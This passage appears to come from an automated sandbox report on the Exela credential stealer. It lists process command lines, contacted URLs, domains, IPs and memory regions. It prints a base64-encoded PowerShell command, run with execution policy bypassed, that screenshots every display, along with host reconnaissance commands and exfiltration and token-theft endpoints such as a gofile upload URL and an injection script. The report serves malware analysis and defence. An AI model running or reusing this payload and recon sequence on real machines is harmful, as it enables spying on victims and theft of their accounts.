C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\chcp.com
|
chcp
|
||
C:\Windows\System32\chcp.com
|
chcp
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
C:\Windows\System32\HOSTNAME.EXE
|
hostname
|
||
C:\Windows\System32\query.exe
|
query user
|
||
C:\Windows\System32\quser.exe
|
"C:\Windows\system32\quser.exe"
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /svc
|
||
C:\Windows\System32\ROUTE.EXE
|
route print
|
||
C:\Windows\System32\sc.exe
|
sc query type= service state= all
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 70 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://account.riotgames.com/api/account/v1/user
|
unknown
|
||
https://accounts.reddit.com/api/access_token
|
unknown
|
||
https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9
|
unknown
|
||
https://github.com/pyca/cryptography/issues/8996
|
unknown
|
||
https://go.microsoft.co
|
unknown
|
||
https://github.com/python-attrs/attrs/issues/251
|
unknown
|
||
https://klaviyo.com/
|
unknown
|
||
https://tiktok.com/
|
unknown
|
||
https://github.com/aio-libs/aiohttp/discussions/6044
|
unknown
|
||
http://python.org
|
unknown
|
||
https://python.org/dev/peps/pep-0263/
|
unknown
|
||
https://www.attrs.org/en/24.2.0/_static/sponsors/
|
unknown
|
||
http://python.org:80
|
unknown
|
||
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
|
unknown
|
||
https://github.com/sponsors/hynek
|
unknown
|
||
https://github.com/python-attrs/attrs/issues/1328)
|
unknown
|
||
https://github.com/pyca/cryptography/actions?query=workflow%3ACI
|
unknown
|
||
https://oauth.reddit.com/api/v1/me
|
unknown
|
||
https://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
https://store1.gofile.io/uploadFile
|
unknown
|
||
https://support.mozilla.org/kb/custom
|
unknown
|
||
https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg
|
unknown
|
||
https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek).
|
unknown
|
||
https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
|
unknown
|
||
https://github.com/python-attrs/attrs)
|
unknown
|
||
https://www.attrs.org/)
|
unknown
|
||
https://i.hizliresim.com/8po0puy.jfifPY9H
|
unknown
|
||
https://twitter.com
|
unknown
|
||
https://twitter.com/home
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
|
unknown
|
||
https://github.com/python-attrs/attrs/issues/136
|
unknown
|
||
https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
|
unknown
|
||
https://i.hizliresim.com/6t31tw2.jpg0m9H
|
unknown
|
||
https://i.hizliresim.com/8po0puy.jfif
|
unknown
|
||
http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
|
unknown
|
||
https://github.com/python-attrs/attrs/issues/1329)
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap
|
unknown
|
||
http://json.org
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
|
unknown
|
||
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
|
unknown
|
||
https://github.com/python-attrs/attrs/issues/1330)
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://instagram.com/p
|
unknown
|
||
https://raw.githubusercontent.com/justforExela/injection/main/injection.js
|
unknown
|
||
https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2
|
unknown
|
||
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://discord.com/api/v8/users/
|
unknown
|
||
https://i.hizliresim.com/qxnzimj.jpg
|
unknown
|
||
https://www.apache.org/licenses/
|
unknown
|
||
https://www.attrs.org/en/latest/names.html)
|
unknown
|
||
https://www.twitch.tv/
|
unknown
|
||
https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
|
unknown
|
||
https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
|
unknown
|
||
https://open.spotify.com/user/
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
|
unknown
|
||
https://filepreviews.io/
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://www.attrs.org/en/stable/why.html#data-classes)
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://cryptography.io/en/latest/installation/
|
unknown
|
||
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
|
unknown
|
||
https://www.attrs.org/en/stable/changelog.html
|
unknown
|
||
https://cryptography.io/en/latest/security/
|
unknown
|
||
https://cffi.readthedocs.io/en/latest/using.html#callbacks
|
unknown
|
||
https://i.hizliresim.com/6t31tw2.jpg
|
unknown
|
||
https://thumbnails.roblox.com/v1/users/avatar?userIds=
|
unknown
|
||
https://www.variomedia.de/
|
unknown
|
||
https://bugs.python.org/issue37179
|
unknown
|
||
https://twitter.com/i/api/1.1/account/update_profile.jsonP
|
unknown
|
||
http://crl.microsoftfM%
|
unknown
|
||
https://www.reddit.com/user/
|
unknown
|
||
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
|
unknown
|
||
https://github.com/quicaxd/Exela-V2.0zI
|
unknown
|
||
https://go.m
|
unknown
|
||
https://github.com/pyca/cryptography/issues
|
unknown
|
||
https://readthedocs.org/projects/cryptography/badge/?version=latest
|
unknown
|
||
https://t.me/ExelaStealer
|
unknown
|
||
https://www.attrs.org/
|
unknown
|
||
https://mahler:8092/site-updates.py
|
unknown
|
||
https://oauth.reddit.com/api/v1/mep
|
unknown
|
||
https://github.com/pyca/cryptography
|
unknown
|
||
https://www.python.org/download/releases/2.3/mro/.
|
unknown
|
||
https://cryptography.io/
|
unknown
|
||
https://github.com
|
unknown
|
||
https://docs.python.org/3/library/asyncio-eventloop.html
|
unknown
|
||
https://github.com/quicaxd/Ex
|
unknown
|
||
https://i.hizliresim.com/6t31tw2.jpgpZ9H
|
unknown
|
||
http://ip-api.com/json
|
208.95.112.1
|
||
http://python.org/
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
|
unknown
|
||
https://peps.python.org/pep-0749/)-implementing
|
unknown
|
||
https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
discord.com
|
162.159.136.232
|
||
ip-api.com
|
208.95.112.1
|
||
store1.gofile.io
|
45.112.123.227
|
||
api.gofile.io
|
45.112.123.126
|
||
198.187.3.20.in-addr.arpa
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
208.95.112.1
|
ip-api.com
|
United States
|
||
162.159.136.232
|
discord.com
|
United States
|
||
162.159.137.232
|
unknown
|
United States
|
||
45.112.123.126
|
api.gofile.io
|
Singapore
|
||
45.112.123.227
|
store1.gofile.io
|
Singapore
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\system32\mlang.dll,-4387
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\system32\mlang.dll,-4407
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters
|
TrapPollTimeMilliSecs
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
18B4A0B0000
|
direct allocation
|
page read and write
|
||
18B48390000
|
direct allocation
|
page read and write
|
||
18B47BF3000
|
heap
|
page read and write
|
||
18B487FD000
|
heap
|
page read and write
|
||
18B49FB0000
|
direct allocation
|
page read and write
|
||
7FF7B2B8B000
|
unkown
|
page readonly
|
||
260D91C9000
|
heap
|
page read and write
|
||
1F78AEEE000
|
heap
|
page read and write
|
||
187225BA000
|
heap
|
page read and write
|
||
260C1181000
|
trusted library allocation
|
page read and write
|
||
1F4C6E11000
|
heap
|
page read and write
|
||
142E9F2D000
|
heap
|
page read and write
|
||
1C7B7431000
|
heap
|
page read and write
|
||
215AB5F0000
|
heap
|
page read and write
|
||
7FFD32FF0000
|
trusted library allocation
|
page execute and read and write
|
||
18B48FAE000
|
heap
|
page read and write
|
||
1F788E90000
|
heap
|
page read and write
|
||
7FFD9E856000
|
unkown
|
page execute and write copy
|
||
7FFDA4637000
|
unkown
|
page execute and read and write
|
||
18B490E9000
|
heap
|
page read and write
|
||
2909FBF3000
|
heap
|
page read and write
|
||
187225CB000
|
heap
|
page read and write
|
||
1C7B73A3000
|
heap
|
page read and write
|
||
18B472D0000
|
heap
|
page read and write
|
||
2909FA50000
|
heap
|
page read and write
|
||
1FAB36C7000
|
heap
|
page read and write
|
||
453F8FF000
|
unkown
|
page read and write
|
||
24D95FE4000
|
heap
|
page read and write
|
||
18B4983F000
|
heap
|
page read and write
|
||
18B4778C000
|
heap
|
page read and write
|
||
36DF8EC000
|
stack
|
page read and write
|
||
1C7B73E1000
|
heap
|
page read and write
|
||
231D6D2A000
|
heap
|
page read and write
|
||
18B4912B000
|
heap
|
page read and write
|
||
276C0AAB000
|
heap
|
page read and write
|
||
231D6D04000
|
heap
|
page read and write
|
||
18B48ED1000
|
heap
|
page read and write
|
||
18387EE7000
|
heap
|
page read and write
|
||
7FFD93DAD000
|
unkown
|
page execute and read and write
|
||
209D92E5000
|
heap
|
page read and write
|
||
18723E33000
|
heap
|
page read and write
|
||
1F789668000
|
heap
|
page read and write
|
||
18389DA4000
|
heap
|
page read and write
|
||
18B45105000
|
heap
|
page read and write
|
||
260BF2D0000
|
heap
|
page read and write
|
||
15ABB9E4000
|
heap
|
page read and write
|
||
18B49713000
|
heap
|
page read and write
|
||
18B49D01000
|
heap
|
page read and write
|
||
1C7B73E3000
|
heap
|
page read and write
|
||
1838806E000
|
heap
|
page read and write
|
||
215AD354000
|
heap
|
page read and write
|
||
1F788FA2000
|
heap
|
page read and write
|
||
B6FA76B000
|
stack
|
page read and write
|
||
231D72C0000
|
heap
|
page read and write
|
||
215ABA19000
|
heap
|
page read and write
|
||
2909FBED000
|
heap
|
page read and write
|
||
215ABA04000
|
heap
|
page read and write
|
||
1FAB3145000
|
heap
|
page read and write
|
||
24373C64000
|
heap
|
page read and write
|
||
1C7B7434000
|
heap
|
page read and write
|
||
7FFD9DF7D000
|
unkown
|
page read and write
|
||
1F789679000
|
heap
|
page read and write
|
||
187225A5000
|
heap
|
page read and write
|
||
18722003000
|
heap
|
page read and write
|
||
260BF263000
|
heap
|
page read and write
|
||
1FAB2F07000
|
heap
|
page read and write
|
||
18B488DA000
|
heap
|
page read and write
|
||
1FAB2F07000
|
heap
|
page read and write
|
||
218F1404000
|
heap
|
page read and write
|
||
7FFDA086D000
|
unkown
|
page execute and read and write
|
||
7FFDA32FC000
|
unkown
|
page execute and read and write
|
||
1F788FB2000
|
heap
|
page read and write
|
||
1C7B76A4000
|
heap
|
page read and write
|
||
231D6CC8000
|
heap
|
page read and write
|
||
24D95B80000
|
heap
|
page read and write
|
||
FD2C87C000
|
stack
|
page read and write
|
||
18B48C7B000
|
heap
|
page read and write
|
||
18B451A4000
|
heap
|
page read and write
|
||
2BD86721000
|
heap
|
page read and write
|
||
18B49D61000
|
heap
|
page read and write
|
||
18B48180000
|
direct allocation
|
page read and write
|
||
18B479A0000
|
heap
|
page read and write
|
||
18721FF4000
|
heap
|
page read and write
|
||
3C8907E000
|
stack
|
page read and write
|
||
7FFD9DFA0000
|
unkown
|
page readonly
|
||
7FFDA3558000
|
unkown
|
page execute and read and write
|
||
18387F61000
|
heap
|
page read and write
|
||
621BCE000
|
stack
|
page read and write
|
||
18B48B5F000
|
heap
|
page read and write
|
||
1C7B79FE000
|
heap
|
page read and write
|
||
7FFD33160000
|
trusted library allocation
|
page read and write
|
||
18721FEF000
|
heap
|
page read and write
|
||
52AA27F000
|
stack
|
page read and write
|
||
242DF790000
|
heap
|
page read and write
|
||
28DDB740000
|
heap
|
page read and write
|
||
7FFDA5490000
|
unkown
|
page readonly
|
||
1C7B73F9000
|
heap
|
page read and write
|
||
7FFD944B3000
|
unkown
|
page execute and read and write
|
||
18721F97000
|
heap
|
page read and write
|
||
18387F27000
|
heap
|
page read and write
|
||
5B407F000
|
stack
|
page read and write
|
||
1F788FB7000
|
heap
|
page read and write
|
||
18B4996E000
|
heap
|
page read and write
|
||
18B47955000
|
heap
|
page read and write
|
||
18B4881F000
|
heap
|
page read and write
|
||
18721FE9000
|
heap
|
page read and write
|
||
18B4767D000
|
heap
|
page read and write
|
||
18389D9D000
|
heap
|
page read and write
|
||
15ABB720000
|
heap
|
page read and write
|
||
18B47C38000
|
heap
|
page read and write
|
||
205C8B10000
|
heap
|
page read and write
|
||
2B2277C2000
|
heap
|
page read and write
|
||
2239CB20000
|
heap
|
page read and write
|
||
18B4767C000
|
heap
|
page read and write
|
||
18B479E2000
|
heap
|
page read and write
|
||
7DF46C4E0000
|
trusted library allocation
|
page execute and read and write
|
||
18B4A202000
|
heap
|
page read and write
|
||
215AB344000
|
heap
|
page read and write
|
||
18B473B0000
|
direct allocation
|
page read and write
|
||
18B493C0000
|
heap
|
page read and write
|
||
215AD350000
|
heap
|
page read and write
|
||
18B4763C000
|
